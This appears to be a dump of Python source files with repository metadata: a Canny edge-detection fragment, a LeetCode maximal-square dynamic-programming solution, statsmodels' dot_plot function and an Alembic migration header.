angle 45 elif (22.5 <= angle[i,j] < 67.5): q = grad_im[i+1, j-1] r = grad_im[i-1, j+1] # for angle 90 elif (67.5 <= angle[i,j] < 112.5): q = grad_im[i+1, j] r = grad_im[i-1, j] # for angle 135 elif (112.5 <= angle[i,j] < 157.5): q = grad_im[i-1, j-1] r = grad_im[i+1, j+1] if (grad_im[i,j] >= q) and (grad_im[i,j] >= r): out_im[i,j] = grad_im[i,j] else: out_im[i,j] = 0 return out_im def double_threshold(im, ltr, htr): """Double threshold aim to identify strong, weak, and non-relevant pixels Parameters ---------- im input image ltr low threshold ratio htr high threshold ratio Returns ------- weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity res non-relevant pixel, not high, not low """ high_thres = im.max() * htr low_thres = high_thres * ltr row, col = im.shape res = np.zeros((row,col), dtype=np.int32) weak = np.int32(25) strong = np.int32(255) strong_i, strong_j = np.where(im >= high_thres) zeros_i, zeros_j = np.where(im < low_thres) weak_i, weak_j = np.where((im <= high_thres) & (im >= low_thres)) res[strong_i, strong_j] = strong res[weak_i, weak_j] = weak return (res, weak, strong) def hysteresis(im, weak, strong=255): """Transforms weak pixel into strong ones if at least 1 pixel around the one being processed is a strong one Parameters ---------- im input image weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity Returns ------- im output result image """ row, col = im.shape for i in range(1, row-1): for j in range(1, col-1): if (im[i,j] == weak): if ((im[i+1, j-1] == strong) or (im[i+1, j] == strong) or (im[i+1, j+1] == strong) or (im[i, j-1] == strong) or (im[i, j+1] == strong) or (im[i-1, j-1] == strong) or (im[i-1, j] == strong) or (im[i-1, j+1] == strong)): im[i, j] = strong else: im[i, j] = 0 return im def rgb2gray(rgb): """Transform 3 colors channels image to grayscale Parameters ---------- rgb input image rgb Returns ------- np.dot grayscale image """ return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140]) def canny(origin_img): """Applies Canny Edge Detection Steps Parameters ---------- origin_img input original image Returns ------- im_final final output edge-detected image """ origin_img = rgb2gray(origin_img) origin_img = origin_img/255.0 # blur image with Gaussian filter with sigma = 2,8,16 filtered_im1 = cv.GaussianBlur(origin_img, (0,0), 2) filtered_im2 = cv.GaussianBlur(origin_img, (0,0), 8) filtered_im3 = cv.GaussianBlur(origin_img, (0,0), 16) # apply Canny edge detectors with the scales you choose to detect edges grad_mag1, angle1 = get_sobel_kernel(filtered_im1) grad_mag2, angle2 = get_sobel_kernel(filtered_im2) grad_mag3, angle3 = get_sobel_kernel(filtered_im3) # apply non-max-suppression im_nms1 = non_max_supression(grad_mag1, angle1) im_nms2 = non_max_supression(grad_mag2, angle2) im_nms3 = non_max_supression(grad_mag3, angle3) im_thres1, weak1, strong1 = double_threshold(im_nms1, ltr=0.07, htr=0.19) im_thres2, weak2, strong2 = double_threshold(im_nms2, ltr=0.07, htr=0.19) im_thres3, weak3, strong3 = double_threshold(im_nms3, ltr=0.07, htr=0.19) im_hys1 = hysteresis(im_thres1, weak1, strong1) im_hys2 = hysteresis(im_thres2, weak2, strong2) im_hys3 = hysteresis(im_thres3, weak3, strong3) im_final = im_hys1 + im_hys2 + im_hys3 im_final = im_final/3.0 # convert two 3 dim if (im_final.ndim == 2): im_final = np.expand_dims(im_final, axis = 2) return im_final
0
0
0
45440d5a96a0fad81f3cedc890db5f5adc5e505e
3,586
py
Python
Python/221.maximal-square.py
Dxyk/LeetCode
e64b405f40b4e3c0f14c617897b775699dd46872
[ "MIT" ]
null
null
null
Python/221.maximal-square.py
Dxyk/LeetCode
e64b405f40b4e3c0f14c617897b775699dd46872
[ "MIT" ]
null
null
null
Python/221.maximal-square.py
Dxyk/LeetCode
e64b405f40b4e3c0f14c617897b775699dd46872
[ "MIT" ]
null
null
null
# # @lc app=leetcode id=221 lang=python3 # # [221] Maximal Square # # https://leetcode.com/problems/maximal-square/description/ # # algorithms # Medium (34.82%) # Likes: 1997 # Dislikes: 49 # Total Accepted: 175K # Total Submissions: 500.4K # Testcase Example: # '[["1","0","1","0","0"], # ["1","0","1","1","1"], # ["1","1","1","1","1"], # ["1","0","0","1","0"]]' # # Given a 2D binary matrix filled with 0's and 1's, find the largest square # containing only 1's and return its area. # # Example: # # # Input: # # 1 0 1 0 0 # 1 0 1 1 1 # 1 1 1 1 1 # 1 0 0 1 0 # # Output: 4 # # # @lc code=start from typing import List # @lc code=end if __name__ == "__main__": m = [["1", "0", "1", "0", "0"], ["1", "0", "1", "1", "1"], ["1", "1", "1", "1", "1"], ["1", "0", "0", "1", "0"]] print(Solution().maximalSquare(m), 4)
27.374046
75
0.444228
# # @lc app=leetcode id=221 lang=python3 # # [221] Maximal Square # # https://leetcode.com/problems/maximal-square/description/ # # algorithms # Medium (34.82%) # Likes: 1997 # Dislikes: 49 # Total Accepted: 175K # Total Submissions: 500.4K # Testcase Example: # '[["1","0","1","0","0"], # ["1","0","1","1","1"], # ["1","1","1","1","1"], # ["1","0","0","1","0"]]' # # Given a 2D binary matrix filled with 0's and 1's, find the largest square # containing only 1's and return its area. # # Example: # # # Input: # # 1 0 1 0 0 # 1 0 1 1 1 # 1 1 1 1 1 # 1 0 0 1 0 # # Output: 4 # # # @lc code=start from typing import List class Solution: def maximalSquare(self, matrix: List[List[str]]) -> int: return self.dp_improved_bottom_up(matrix) def dp_improved_bottom_up(self, matrix: List[List[str]]) -> int: """ DP Bottom up solution with improved space efficiency Runtime: O(mn) Space: O(n) """ if len(matrix) == 0 or len(matrix[0]) == 0: return 0 res_len = 0 prev = 0 memo = [0] * (len(matrix[0]) + 1) for i in range(1, len(matrix) + 1): for j in range(1, len(matrix[0]) + 1): temp = memo[j] if matrix[i - 1][j - 1] == "1": memo[j] = min(memo[j - 1], prev, memo[j]) + 1 res_len = max(memo[j], res_len) else: memo[j] = 0 prev = temp return res_len ** 2 def dp_bottom_up(self, matrix: List[List[str]]) -> int: """ DP Bottom up solution Runtime: O(mn) Space: O(mn) """ if len(matrix) == 0 or len(matrix[0]) == 0: return 0 res_len = 0 memo = [[0] * (len(matrix[0]) + 1) for _ in range(len(matrix) + 1)] for i in range(1, len(matrix) + 1): for j in range(1, len(matrix[0]) + 1): if matrix[i - 1][j - 1] == "1": memo[i][j] = min(memo[i - 1][j], memo[i][j - 1], memo[i - 1][j - 1]) + 1 res_len = max(memo[i][j], res_len) return res_len ** 2 def dp_recursive(self, matrix: List[List[str]]) -> int: """ DP Recursive solution Subproblem Structure: Let m = num rows, n = num cols P(i, j) := max area's length using the element at matrix[i][j] P(i, j) = - 0 if matrix[i][j] == "0" - min(P(i - 1, j), P(i, j - 1), P(i - 1, j - 1)) + 1 if matrix[i][j] == "1" """ if len(matrix) == 0 or len(matrix[0]) == 0: return 0 res_len = [0] def helper(i: int, j: int) -> int: if i < 0 or j < 0: return 0 if i == 0 or j == 0: return 1 if matrix[i][j] == "1" else 0 top_res = helper(i, j - 1) left_res = helper(i - 1, j) top_left_res = helper(i - 1, j - 1) if matrix[i][j] == "1": res = min(top_res, left_res, top_left_res) + 1 else: res = 0 res_len[0] = max(res, res_len[0]) return res helper(len(matrix) - 1, len(matrix[0]) - 1) return res_len[0] ** 2 # @lc code=end if __name__ == "__main__": m = [["1", "0", "1", "0", "0"], ["1", "0", "1", "1", "1"], ["1", "1", "1", "1", "1"], ["1", "0", "0", "1", "0"]] print(Solution().maximalSquare(m), 4)
579
2,115
23
5db5e96c68daebdf9c023c5d9ea8446b92163a47
17,891
py
Python
statsmodels/graphics/dotplots.py
nikhase/statsmodels
e1822d4513f442002816bb898ca5794785f35c32
[ "BSD-3-Clause" ]
15
2015-03-03T09:47:42.000Z
2022-01-05T18:28:31.000Z
statsmodels/graphics/dotplots.py
nikhase/statsmodels
e1822d4513f442002816bb898ca5794785f35c32
[ "BSD-3-Clause" ]
7
2015-11-20T08:33:04.000Z
2020-07-24T19:34:39.000Z
statsmodels/graphics/dotplots.py
nikhase/statsmodels
e1822d4513f442002816bb898ca5794785f35c32
[ "BSD-3-Clause" ]
14
2015-01-06T22:08:34.000Z
2021-01-01T16:33:23.000Z
import numpy as np from statsmodels.compat import range from . import utils def dot_plot(points, intervals=None, lines=None, sections=None, styles=None, marker_props=None, line_props=None, split_names=None, section_order=None, line_order=None, stacked=False, styles_order=None, striped=False, horizontal=True, show_names="both", fmt_left_name=None, fmt_right_name=None, show_section_titles=None, ax=None): """ Produce a dotplot similar in style to those in Cleveland's "Visualizing Data" book. These are also known as "forest plots". Parameters ---------- points : array_like The quantitative values to be plotted as markers. intervals : array_like The intervals to be plotted around the points. The elements of `intervals` are either scalars or sequences of length 2. A scalar indicates the half width of a symmetric interval. A sequence of length 2 contains the left and right half-widths (respectively) of a nonsymmetric interval. If None, no intervals are drawn. lines : array_like A grouping variable indicating which points/intervals are drawn on a common line. If None, each point/interval appears on its own line. sections : array_like A grouping variable indicating which lines are grouped into sections. If None, everything is drawn in a single section. styles : array_like A grouping label defining the plotting style of the markers and intervals. marker_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting markers. Useful keyword arguments are "color", "marker", and "ms" (marker size). line_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting interval lines. Useful keyword arguments are "color", "linestyle", "solid_capstyle", and "linewidth". split_names : string If not None, this is used to split the values of `lines` into substrings that are drawn in the left and right margins, respectively. If None, the values of `lines` are drawn in the left margin. section_order : array_like The section labels in the order in which they appear in the dotplot. line_order : array_like The line labels in the order in which they appear in the dotplot. stacked : boolean If True, when multiple points or intervals are drawn on the same line, they are offset from each other. styles_order : array_like If stacked=True, this is the order in which the point styles on a given line are drawn from top to bottom (if horizontal is True) or from left to right (if horiontal is False). If None (default), the order is lexical. striped : boolean If True, every other line is enclosed in a shaded box. horizontal : boolean If True (default), the lines are drawn horizontally, otherwise they are drawn vertically. show_names : string Determines whether labels (names) are shown in the left and/or right margins (top/bottom margins if `horizontal` is True). If `both`, labels are drawn in both margins, if 'left', labels are drawn in the left or top margin. If `right`, labels are drawn in the right or bottom margin. fmt_left_name : function The left/top margin names are passed through this function before drawing on the plot. fmt_right_name : function The right/bottom marginnames are passed through this function before drawing on the plot. show_section_titles : bool or None If None, section titles are drawn only if there is more than one section. If False/True, section titles are never/always drawn, respectively. ax : matplotlib.axes The axes on which the dotplot is drawn. If None, a new axes is created. Returns ------- fig : Figure The figure given by `ax.figure` or a new instance. Notes ----- `points`, `intervals`, `lines`, `sections`, `styles` must all have the same length whenever present. Examples -------- This is a simple dotplot with one point per line: >>> dot_plot(points=point_values) This dotplot has labels on the lines (if elements in `label_values` are repeated, the corresponding points appear on the same line): >>> dot_plot(points=point_values, lines=label_values) References ---------- * Cleveland, William S. (1993). "Visualizing Data". Hobart Press. * Jacoby, William G. (2006) "The Dot Plot: A Graphical Display for Labeled Quantitative Values." The Political Methodologist 14(1): 6-14. """ import matplotlib.transforms as transforms fig, ax = utils.create_mpl_ax(ax) # Convert to numpy arrays if that is not what we are given. points = np.asarray(points) asarray_or_none = lambda x : None if x is None else np.asarray(x) intervals = asarray_or_none(intervals) lines = asarray_or_none(lines) sections = asarray_or_none(sections) styles = asarray_or_none(styles) # Total number of points npoint = len(points) # Set default line values if needed if lines is None: lines = np.arange(npoint) # Set default section values if needed if sections is None: sections = np.zeros(npoint) # Set default style values if needed if styles is None: styles = np.zeros(npoint) # The vertical space (in inches) for a section title section_title_space = 0.5 # The number of sections nsect = len(set(sections)) if section_order is not None: nsect = len(set(section_order)) # The number of section titles if show_section_titles == False: draw_section_titles = False nsect_title = 0 elif show_section_titles == True: draw_section_titles = True nsect_title = nsect else: draw_section_titles = nsect > 1 nsect_title = nsect if nsect > 1 else 0 # The total vertical space devoted to section titles. section_space_total = section_title_space * nsect_title # Add a bit of room so that points that fall at the axis limits # are not cut in half. ax.set_xmargin(0.02) ax.set_ymargin(0.02) if section_order is None: lines0 = list(set(sections)) lines0.sort() else: lines0 = section_order if line_order is None: lines1 = list(set(lines)) lines1.sort() else: lines1 = line_order # A map from (section,line) codes to index positions. lines_map = {} for i in range(npoint): if section_order is not None and sections[i] not in section_order: continue if line_order is not None and lines[i] not in line_order: continue ky = (sections[i], lines[i]) if ky not in lines_map: lines_map[ky] = [] lines_map[ky].append(i) # Get the size of the axes on the parent figure in inches bbox = ax.get_window_extent().transformed( fig.dpi_scale_trans.inverted()) awidth, aheight = bbox.width, bbox.height # The number of lines in the plot. nrows = len(lines_map) # The positions of the lowest and highest guideline in axes # coordinates (for horizontal dotplots), or the leftmost and # rightmost guidelines (for vertical dotplots). bottom, top = 0, 1 if horizontal: # x coordinate is data, y coordinate is axes trans = transforms.blended_transform_factory(ax.transData, ax.transAxes) else: # x coordinate is axes, y coordinate is data trans = transforms.blended_transform_factory(ax.transAxes, ax.transData) # Space used for a section title, in axes coordinates title_space_axes = section_title_space / aheight # Space between lines if horizontal: dpos = (top - bottom - nsect_title*title_space_axes) /\ float(nrows) else: dpos = (top - bottom) / float(nrows) # Determine the spacing for stacked points if styles_order is not None: style_codes = styles_order else: style_codes = list(set(styles)) style_codes.sort() # Order is top to bottom for horizontal plots, so need to # flip. if horizontal: style_codes = style_codes[::-1] # nval is the maximum number of points on one line. nval = len(style_codes) if nval > 1: stackd = dpos / (2.5*(float(nval)-1)) else: stackd = 0. # Map from style code to its integer position style_codes_map = {x: style_codes.index(x) for x in style_codes} # Setup default marker styles colors = ["r", "g", "b", "y", "k", "purple", "orange"] if marker_props is None: marker_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in marker_props[sc]: marker_props[sc]["color"] = colors[j % len(colors)] if "marker" not in marker_props[sc]: marker_props[sc]["marker"] = "o" if "ms" not in marker_props[sc]: marker_props[sc]["ms"] = 10 if stackd == 0 else 6 # Setup default line styles if line_props is None: line_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in line_props[sc]: line_props[sc]["color"] = "grey" if "linewidth" not in line_props[sc]: line_props[sc]["linewidth"] = 2 if stackd > 0 else 8 if horizontal: # The vertical position of the first line. pos = top - dpos/2 if nsect == 1 else top else: # The horizontal position of the first line. pos = bottom + dpos/2 # Points that have already been labeled labeled = set() # Positions of the y axis grid lines ticks = [] # Loop through the sections for k0 in lines0: # Draw a section title if draw_section_titles: if horizontal: y0 = pos + dpos/2 if k0 == lines0[0] else pos ax.fill_between((0, 1), (y0,y0), (pos-0.7*title_space_axes, pos-0.7*title_space_axes), color='darkgrey', transform=ax.transAxes, zorder=1) txt = ax.text(0.5, pos - 0.35*title_space_axes, k0, horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) txt.set_fontweight("bold") pos -= title_space_axes else: m = len([k for k in lines_map if k[0] == k0]) ax.fill_between((pos-dpos/2+0.01, pos+(m-1)*dpos+dpos/2-0.01), (1.01,1.01), (1.06,1.06), color='darkgrey', transform=ax.transAxes, zorder=1, clip_on=False) txt = ax.text(pos + (m-1)*dpos/2, 1.02, k0, horizontalalignment='center', verticalalignment='bottom', transform=ax.transAxes) txt.set_fontweight("bold") jrow = 0 for k1 in lines1: # No data to plot if (k0, k1) not in lines_map: continue # Draw the guideline if horizontal: ax.axhline(pos, color='grey') else: ax.axvline(pos, color='grey') # Set up the labels if split_names is not None: us = k1.split(split_names) if len(us) >= 2: left_label, right_label = us[0], us[1] else: left_label, right_label = k1, None else: left_label, right_label = k1, None if fmt_left_name is not None: left_label = fmt_left_name(left_label) if fmt_right_name is not None: right_label = fmt_right_name(right_label) # Draw the stripe if striped and jrow % 2 == 0: if horizontal: ax.fill_between((0, 1), (pos-dpos/2, pos-dpos/2), (pos+dpos/2, pos+dpos/2), color='lightgrey', transform=ax.transAxes, zorder=0) else: ax.fill_between((pos-dpos/2, pos+dpos/2), (0, 0), (1, 1), color='lightgrey', transform=ax.transAxes, zorder=0) jrow += 1 # Draw the left margin label if show_names.lower() in ("left", "both"): if horizontal: ax.text(-0.1/awidth, pos, left_label, horizontalalignment="right", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, -0.1/aheight, left_label, horizontalalignment="center", verticalalignment='top', transform=ax.transAxes, family='monospace') # Draw the right margin label if show_names.lower() in ("right", "both"): if right_label is not None: if horizontal: ax.text(1 + 0.1/awidth, pos, right_label, horizontalalignment="left", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, 1 + 0.1/aheight, right_label, horizontalalignment="center", verticalalignment='bottom', transform=ax.transAxes, family='monospace') # Save the vertical position so that we can place the # tick marks ticks.append(pos) # Loop over the points in one line for ji,jp in enumerate(lines_map[(k0,k1)]): # Calculate the vertical offset yo = 0 if stacked: yo = -dpos/5 + style_codes_map[styles[jp]]*stackd pt = points[jp] # Plot the interval if intervals is not None: # Symmetric interval if np.isscalar(intervals[jp]): lcb, ucb = pt - intervals[jp],\ pt + intervals[jp] # Nonsymmetric interval else: lcb, ucb = pt - intervals[jp][0],\ pt + intervals[jp][1] # Draw the interval if horizontal: ax.plot([lcb, ucb], [pos+yo, pos+yo], '-', transform=trans, **line_props[styles[jp]]) else: ax.plot([pos+yo, pos+yo], [lcb, ucb], '-', transform=trans, **line_props[styles[jp]]) # Plot the point sl = styles[jp] sll = sl if sl not in labeled else None labeled.add(sl) if horizontal: ax.plot([pt,], [pos+yo,], ls='None', transform=trans, label=sll, **marker_props[sl]) else: ax.plot([pos+yo,], [pt,], ls='None', transform=trans, label=sll, **marker_props[sl]) if horizontal: pos -= dpos else: pos += dpos # Set up the axis if horizontal: ax.xaxis.set_ticks_position("bottom") ax.yaxis.set_ticks_position("none") ax.set_yticklabels([]) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['bottom'].set_position(('axes', -0.1/aheight)) ax.set_ylim(0, 1) ax.yaxis.set_ticks(ticks) ax.autoscale_view(scaley=False, tight=True) else: ax.yaxis.set_ticks_position("left") ax.xaxis.set_ticks_position("none") ax.set_xticklabels([]) ax.spines['bottom'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['left'].set_position(('axes', -0.1/awidth)) ax.set_xlim(0, 1) ax.xaxis.set_ticks(ticks) ax.autoscale_view(scalex=False, tight=True) return fig
36.737166
74
0.54519
import numpy as np from statsmodels.compat import range from . import utils def dot_plot(points, intervals=None, lines=None, sections=None, styles=None, marker_props=None, line_props=None, split_names=None, section_order=None, line_order=None, stacked=False, styles_order=None, striped=False, horizontal=True, show_names="both", fmt_left_name=None, fmt_right_name=None, show_section_titles=None, ax=None): """ Produce a dotplot similar in style to those in Cleveland's "Visualizing Data" book. These are also known as "forest plots". Parameters ---------- points : array_like The quantitative values to be plotted as markers. intervals : array_like The intervals to be plotted around the points. The elements of `intervals` are either scalars or sequences of length 2. A scalar indicates the half width of a symmetric interval. A sequence of length 2 contains the left and right half-widths (respectively) of a nonsymmetric interval. If None, no intervals are drawn. lines : array_like A grouping variable indicating which points/intervals are drawn on a common line. If None, each point/interval appears on its own line. sections : array_like A grouping variable indicating which lines are grouped into sections. If None, everything is drawn in a single section. styles : array_like A grouping label defining the plotting style of the markers and intervals. marker_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting markers. Useful keyword arguments are "color", "marker", and "ms" (marker size). line_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting interval lines. Useful keyword arguments are "color", "linestyle", "solid_capstyle", and "linewidth". split_names : string If not None, this is used to split the values of `lines` into substrings that are drawn in the left and right margins, respectively. If None, the values of `lines` are drawn in the left margin. section_order : array_like The section labels in the order in which they appear in the dotplot. line_order : array_like The line labels in the order in which they appear in the dotplot. stacked : boolean If True, when multiple points or intervals are drawn on the same line, they are offset from each other. styles_order : array_like If stacked=True, this is the order in which the point styles on a given line are drawn from top to bottom (if horizontal is True) or from left to right (if horiontal is False). If None (default), the order is lexical. striped : boolean If True, every other line is enclosed in a shaded box. horizontal : boolean If True (default), the lines are drawn horizontally, otherwise they are drawn vertically. show_names : string Determines whether labels (names) are shown in the left and/or right margins (top/bottom margins if `horizontal` is True). If `both`, labels are drawn in both margins, if 'left', labels are drawn in the left or top margin. If `right`, labels are drawn in the right or bottom margin. fmt_left_name : function The left/top margin names are passed through this function before drawing on the plot. fmt_right_name : function The right/bottom marginnames are passed through this function before drawing on the plot. show_section_titles : bool or None If None, section titles are drawn only if there is more than one section. If False/True, section titles are never/always drawn, respectively. ax : matplotlib.axes The axes on which the dotplot is drawn. If None, a new axes is created. Returns ------- fig : Figure The figure given by `ax.figure` or a new instance. Notes ----- `points`, `intervals`, `lines`, `sections`, `styles` must all have the same length whenever present. Examples -------- This is a simple dotplot with one point per line: >>> dot_plot(points=point_values) This dotplot has labels on the lines (if elements in `label_values` are repeated, the corresponding points appear on the same line): >>> dot_plot(points=point_values, lines=label_values) References ---------- * Cleveland, William S. (1993). "Visualizing Data". Hobart Press. * Jacoby, William G. (2006) "The Dot Plot: A Graphical Display for Labeled Quantitative Values." The Political Methodologist 14(1): 6-14. """ import matplotlib.transforms as transforms fig, ax = utils.create_mpl_ax(ax) # Convert to numpy arrays if that is not what we are given. points = np.asarray(points) asarray_or_none = lambda x : None if x is None else np.asarray(x) intervals = asarray_or_none(intervals) lines = asarray_or_none(lines) sections = asarray_or_none(sections) styles = asarray_or_none(styles) # Total number of points npoint = len(points) # Set default line values if needed if lines is None: lines = np.arange(npoint) # Set default section values if needed if sections is None: sections = np.zeros(npoint) # Set default style values if needed if styles is None: styles = np.zeros(npoint) # The vertical space (in inches) for a section title section_title_space = 0.5 # The number of sections nsect = len(set(sections)) if section_order is not None: nsect = len(set(section_order)) # The number of section titles if show_section_titles == False: draw_section_titles = False nsect_title = 0 elif show_section_titles == True: draw_section_titles = True nsect_title = nsect else: draw_section_titles = nsect > 1 nsect_title = nsect if nsect > 1 else 0 # The total vertical space devoted to section titles. section_space_total = section_title_space * nsect_title # Add a bit of room so that points that fall at the axis limits # are not cut in half. ax.set_xmargin(0.02) ax.set_ymargin(0.02) if section_order is None: lines0 = list(set(sections)) lines0.sort() else: lines0 = section_order if line_order is None: lines1 = list(set(lines)) lines1.sort() else: lines1 = line_order # A map from (section,line) codes to index positions. lines_map = {} for i in range(npoint): if section_order is not None and sections[i] not in section_order: continue if line_order is not None and lines[i] not in line_order: continue ky = (sections[i], lines[i]) if ky not in lines_map: lines_map[ky] = [] lines_map[ky].append(i) # Get the size of the axes on the parent figure in inches bbox = ax.get_window_extent().transformed( fig.dpi_scale_trans.inverted()) awidth, aheight = bbox.width, bbox.height # The number of lines in the plot. nrows = len(lines_map) # The positions of the lowest and highest guideline in axes # coordinates (for horizontal dotplots), or the leftmost and # rightmost guidelines (for vertical dotplots). bottom, top = 0, 1 if horizontal: # x coordinate is data, y coordinate is axes trans = transforms.blended_transform_factory(ax.transData, ax.transAxes) else: # x coordinate is axes, y coordinate is data trans = transforms.blended_transform_factory(ax.transAxes, ax.transData) # Space used for a section title, in axes coordinates title_space_axes = section_title_space / aheight # Space between lines if horizontal: dpos = (top - bottom - nsect_title*title_space_axes) /\ float(nrows) else: dpos = (top - bottom) / float(nrows) # Determine the spacing for stacked points if styles_order is not None: style_codes = styles_order else: style_codes = list(set(styles)) style_codes.sort() # Order is top to bottom for horizontal plots, so need to # flip. if horizontal: style_codes = style_codes[::-1] # nval is the maximum number of points on one line. nval = len(style_codes) if nval > 1: stackd = dpos / (2.5*(float(nval)-1)) else: stackd = 0. # Map from style code to its integer position style_codes_map = {x: style_codes.index(x) for x in style_codes} # Setup default marker styles colors = ["r", "g", "b", "y", "k", "purple", "orange"] if marker_props is None: marker_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in marker_props[sc]: marker_props[sc]["color"] = colors[j % len(colors)] if "marker" not in marker_props[sc]: marker_props[sc]["marker"] = "o" if "ms" not in marker_props[sc]: marker_props[sc]["ms"] = 10 if stackd == 0 else 6 # Setup default line styles if line_props is None: line_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in line_props[sc]: line_props[sc]["color"] = "grey" if "linewidth" not in line_props[sc]: line_props[sc]["linewidth"] = 2 if stackd > 0 else 8 if horizontal: # The vertical position of the first line. pos = top - dpos/2 if nsect == 1 else top else: # The horizontal position of the first line. pos = bottom + dpos/2 # Points that have already been labeled labeled = set() # Positions of the y axis grid lines ticks = [] # Loop through the sections for k0 in lines0: # Draw a section title if draw_section_titles: if horizontal: y0 = pos + dpos/2 if k0 == lines0[0] else pos ax.fill_between((0, 1), (y0,y0), (pos-0.7*title_space_axes, pos-0.7*title_space_axes), color='darkgrey', transform=ax.transAxes, zorder=1) txt = ax.text(0.5, pos - 0.35*title_space_axes, k0, horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) txt.set_fontweight("bold") pos -= title_space_axes else: m = len([k for k in lines_map if k[0] == k0]) ax.fill_between((pos-dpos/2+0.01, pos+(m-1)*dpos+dpos/2-0.01), (1.01,1.01), (1.06,1.06), color='darkgrey', transform=ax.transAxes, zorder=1, clip_on=False) txt = ax.text(pos + (m-1)*dpos/2, 1.02, k0, horizontalalignment='center', verticalalignment='bottom', transform=ax.transAxes) txt.set_fontweight("bold") jrow = 0 for k1 in lines1: # No data to plot if (k0, k1) not in lines_map: continue # Draw the guideline if horizontal: ax.axhline(pos, color='grey') else: ax.axvline(pos, color='grey') # Set up the labels if split_names is not None: us = k1.split(split_names) if len(us) >= 2: left_label, right_label = us[0], us[1] else: left_label, right_label = k1, None else: left_label, right_label = k1, None if fmt_left_name is not None: left_label = fmt_left_name(left_label) if fmt_right_name is not None: right_label = fmt_right_name(right_label) # Draw the stripe if striped and jrow % 2 == 0: if horizontal: ax.fill_between((0, 1), (pos-dpos/2, pos-dpos/2), (pos+dpos/2, pos+dpos/2), color='lightgrey', transform=ax.transAxes, zorder=0) else: ax.fill_between((pos-dpos/2, pos+dpos/2), (0, 0), (1, 1), color='lightgrey', transform=ax.transAxes, zorder=0) jrow += 1 # Draw the left margin label if show_names.lower() in ("left", "both"): if horizontal: ax.text(-0.1/awidth, pos, left_label, horizontalalignment="right", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, -0.1/aheight, left_label, horizontalalignment="center", verticalalignment='top', transform=ax.transAxes, family='monospace') # Draw the right margin label if show_names.lower() in ("right", "both"): if right_label is not None: if horizontal: ax.text(1 + 0.1/awidth, pos, right_label, horizontalalignment="left", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, 1 + 0.1/aheight, right_label, horizontalalignment="center", verticalalignment='bottom', transform=ax.transAxes, family='monospace') # Save the vertical position so that we can place the # tick marks ticks.append(pos) # Loop over the points in one line for ji,jp in enumerate(lines_map[(k0,k1)]): # Calculate the vertical offset yo = 0 if stacked: yo = -dpos/5 + style_codes_map[styles[jp]]*stackd pt = points[jp] # Plot the interval if intervals is not None: # Symmetric interval if np.isscalar(intervals[jp]): lcb, ucb = pt - intervals[jp],\ pt + intervals[jp] # Nonsymmetric interval else: lcb, ucb = pt - intervals[jp][0],\ pt + intervals[jp][1] # Draw the interval if horizontal: ax.plot([lcb, ucb], [pos+yo, pos+yo], '-', transform=trans, **line_props[styles[jp]]) else: ax.plot([pos+yo, pos+yo], [lcb, ucb], '-', transform=trans, **line_props[styles[jp]]) # Plot the point sl = styles[jp] sll = sl if sl not in labeled else None labeled.add(sl) if horizontal: ax.plot([pt,], [pos+yo,], ls='None', transform=trans, label=sll, **marker_props[sl]) else: ax.plot([pos+yo,], [pt,], ls='None', transform=trans, label=sll, **marker_props[sl]) if horizontal: pos -= dpos else: pos += dpos # Set up the axis if horizontal: ax.xaxis.set_ticks_position("bottom") ax.yaxis.set_ticks_position("none") ax.set_yticklabels([]) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['bottom'].set_position(('axes', -0.1/aheight)) ax.set_ylim(0, 1) ax.yaxis.set_ticks(ticks) ax.autoscale_view(scaley=False, tight=True) else: ax.yaxis.set_ticks_position("left") ax.xaxis.set_ticks_position("none") ax.set_xticklabels([]) ax.spines['bottom'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['left'].set_position(('axes', -0.1/awidth)) ax.set_xlim(0, 1) ax.xaxis.set_ticks(ticks) ax.autoscale_view(scalex=False, tight=True) return fig
0
0
0
70fe63fd252ad0c12abc04de082c33c848a23ee4
633
py
Python
agent/alembic/versions/746f77fcf519_create_pipeline_offset_table.py
eacherkan-aternity/daria
7c77a2f52c09c852017b16949a848fa51f0fb579
[ "Apache-2.0" ]
16
2019-04-03T08:31:54.000Z
2021-01-24T17:12:04.000Z
agent/alembic/versions/746f77fcf519_create_pipeline_offset_table.py
eacherkan-aternity/daria
7c77a2f52c09c852017b16949a848fa51f0fb579
[ "Apache-2.0" ]
10
2020-01-20T14:59:06.000Z
2022-01-21T10:19:16.000Z
agent/alembic/versions/746f77fcf519_create_pipeline_offset_table.py
eacherkan-aternity/daria
7c77a2f52c09c852017b16949a848fa51f0fb579
[ "Apache-2.0" ]
5
2021-01-08T19:23:03.000Z
2021-11-09T14:15:49.000Z
"""create_pipeline_offset_table Revision ID: 746f77fcf519 Revises: 63c90017aa5d Create Date: 2020-10-20 13:32:59.329693 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '746f77fcf519' down_revision = '63c90017aa5d' branch_labels = None depends_on = None
21.1
74
0.71564
